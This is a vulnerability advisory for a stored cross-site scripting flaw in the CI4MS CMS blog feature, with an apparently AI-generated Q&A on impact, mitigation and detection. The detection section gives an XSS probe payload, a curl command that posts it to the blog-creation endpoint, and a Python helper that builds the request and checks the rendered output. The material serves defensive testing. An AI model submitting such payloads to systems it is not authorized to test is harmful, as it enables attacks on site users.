CVE-2026-34568
Status: Received - Intake
Stored XSS in CI4MS Blog Post Content Before

Publication date: 2026-04-01

Last updated on: 2026-04-06

Assigner: GitHub, Inc.

Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-04-02
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor: ci4-cms-erp
Product: ci4ms
Version / Range: all versions before 0.31.0.0 (0.31.0.0 itself excluded)
Exploitability
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Powered Q&A
Can you explain this vulnerability to me?

The vulnerability exists in CI4MS, a CodeIgniter 4-based CMS skeleton, prior to version 0.31.0.0. The application does not properly sanitize user-controlled input when creating or editing blog posts. This allows an attacker to inject malicious JavaScript code into the blog post content. Since this content is stored on the server and later rendered in multiple views without proper output encoding, it leads to stored cross-site scripting (XSS).


How can this vulnerability impact me? :

Because the payload is stored with the post, it runs in the browser of every user who views that post, including editors or administrators who open the backend listing, and it executes with that viewer's privileges in the application. An attacker's script can issue requests on the victim's behalf, read data the victim's pages expose, deface the site, or redirect visitors to attacker-controlled content. Direct theft of the session cookie only works if the cookie lacks the HttpOnly flag, but the script can act as the victim regardless. The CVSS score of 9.1 cited for this issue falls in the critical range and reflects potential impact on confidentiality, integrity, and availability.


What immediate steps should I take to mitigate this vulnerability?

The root cause is that blog post content is accepted without sanitization and then emitted in views without output encoding, giving stored cross-site scripting (XSS). The immediate mitigation is to upgrade CI4MS to version 0.31.0.0 or later, where the issue has been patched. Until the upgrade is in place, limit the roles that can create or edit blog posts to trusted accounts, since the injection point is the backend authoring function. After upgrading, review posts that were created before the patch for script tags or event-handler attributes, because upgrading does not by itself clean content already stored in the database.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability lets an attacker store a malicious JavaScript payload in blog post content that the application then renders unsafely to other users. A stored XSS flaw of this kind can result in unauthorized access, data manipulation, or disclosure of the data those users can see.

Weaknesses like this bear on standards and regulations such as GDPR and HIPAA, which require that personal data be protected and that user-supplied input be handled securely so that it cannot become a vector for unauthorized access or a data breach. Failing to sanitize and encode user input, as in this case, may therefore lead to a reportable exposure or compromise under those regimes.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection is an application-level test rather than a network signature: submit a stored-XSS probe through the blog create/edit function and check whether it comes back unencoded in the views that render post content. The injection point is the backend authoring endpoint /backend/blogs/create; the stored content is rendered in the backend listing /backend/blogs/ and in the public post view /blog/{id}. The payload `<img src=x onerror=alert(document.domain)>` is a convenient probe because it runs without a `<script>` tag and so also catches filters that only strip script elements.

Use curl or an automated web vulnerability scanner to submit the probe, then inspect the rendered pages. Because post authoring lives under /backend/, the request must carry an authenticated session with blog-authoring rights and, on a CodeIgniter 4 application, the CSRF token taken from the form. Test only systems you are authorized to test.

Example curl command (the `ci_session` cookie and `csrf_test_name` field are CodeIgniter 4 defaults and the `content` field name is assumed; adjust all three to the real form):

  • curl -X POST -b 'ci_session=<authenticated session id>' --data-urlencode 'csrf_test_name=<token from the form>' --data-urlencode 'content=<img src=x onerror=alert(document.domain)>' 'https://your-target-domain/backend/blogs/create'

Then load the post (for example /blog/{id}, or the listing at /backend/blogs/) and check the returned HTML. If the response contains the literal `<img src=x onerror=alert(document.domain)>`, the application is vulnerable; a patched version returns `&lt;img src=x onerror=alert(document.domain)&gt;`, which the browser displays as text and never executes. Opening the page in a browser and seeing the `alert()` dialog is the same result observed interactively.

Additionally, review the view templates. In a CodeIgniter 4 application the sink is a view that echoes the post body directly, for example `<?= $post->content ?>` (variable name illustrative), instead of passing it through `esc()`. Check any client-side code that inserts post content with innerHTML or jQuery's `.html()` as well.
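The check described above, as an added example (not code from the advisory or from the CI4MS project), done offline in Python so the logic can be reasoned about before touching a live system. It also shows, for the description's point about missing output encoding, what a correctly escaped view should emit for the stored payload. Assumed and not confirmed by the advisory: the post body is submitted in a form field named `content`, the target uses CodeIgniter 4 defaults for the session cookie (`ci_session`) and CSRF field (`csrf_test_name`), and the two sample HTML responses are constructed, not captured.

```python
"""Stored-XSS probe helpers for the CI4MS blog endpoints (added example).

Assumptions (none confirmed by the advisory):
  - the post body is posted in a form field named `content`;
  - CodeIgniter 4 defaults apply: session cookie `ci_session`,
    CSRF form field `csrf_test_name`;
  - SAMPLE_UNPATCHED / SAMPLE_PATCHED are constructed responses.
"""
import html
import re
import urllib.parse
import urllib.request

# The probe payload quoted in the advisory's Q&A.
PAYLOAD = '<img src=x onerror=alert(document.domain)>'


def expected_encoded(payload: str = PAYLOAD) -> str:
    """Return what a correctly escaped view should emit for the payload.

    html.escape(quote=True) turns < > & " ' into entities, which is the same
    result CI4's esc() gives for this payload (it contains no quote characters).
    """
    return html.escape(payload, quote=True)


def build_create_request(base_url: str, session_cookie: str, csrf_token: str,
                         payload: str = PAYLOAD) -> urllib.request.Request:
    """Build, but do not send, the POST to /backend/blogs/create.

    The body is form-encoded so '<' and '>' survive transport, and the request
    carries the authenticated session plus the CSRF token a CI4 form expects.
    """
    body = urllib.parse.urlencode({
        'csrf_test_name': csrf_token,  # assumed CI4 default CSRF field name
        'content': payload,            # assumed field holding the post body
    }).encode()
    req = urllib.request.Request(
        base_url.rstrip('/') + '/backend/blogs/create', data=body, method='POST')
    req.add_header('Cookie', f'ci_session={session_cookie}')  # assumed cookie name
    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
    return req


# An <img ...> tag with an onerror handler whose angle brackets were NOT encoded.
_RAW_EVENT_HANDLER = re.compile(r'<img\b[^>]*\bonerror\s*=', re.IGNORECASE)


def classify_rendering(page_html: str, payload: str = PAYLOAD) -> str:
    """Classify one fetched view (/blog/{id} or /backend/blogs/).

    'vulnerable' - the payload, or any raw <img onerror=> tag, is present in
                   the markup unencoded, so the browser will execute it;
    'encoded'    - only the entity-encoded form is present (patched behaviour);
    'absent'     - the probe was not rendered on this page at all.
    A plain string check on the response body is enough to separate these
    cases; no headless browser is needed.
    """
    if payload in page_html or _RAW_EVENT_HANDLER.search(page_html):
        return 'vulnerable'
    if expected_encoded(payload) in page_html:
        return 'encoded'
    return 'absent'


# Constructed sample responses (not captured from any real CI4MS instance).
SAMPLE_UNPATCHED = (
    '<article class="post"><h1>Probe</h1>\n'
    '<div class="body"><img src=x onerror=alert(document.domain)></div>\n'
    '</article>'
)
SAMPLE_PATCHED = (
    '<article class="post"><h1>Probe</h1>\n'
    '<div class="body">&lt;img src=x onerror=alert(document.domain)&gt;</div>\n'
    '</article>'
)


def run_samples() -> dict:
    """Classify both constructed samples; used as the offline self-check."""
    return {
        'unpatched': classify_rendering(SAMPLE_UNPATCHED),
        'patched': classify_rendering(SAMPLE_PATCHED),
    }


if __name__ == '__main__':
    print('escaped form a patched view should emit:', expected_encoded())
    print(run_samples())
    req = build_create_request('https://your-target-domain', '<session>', '<token>')
    print(req.get_method(), req.full_url, req.data)
```

Against a live system, send the request returned by `build_create_request` with `urllib.request.urlopen` (or the equivalent curl command above), fetch the post view, and pass the response body to `classify_rendering`; anything other than `'encoded'` or `'absent'` means the fix is not in place.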

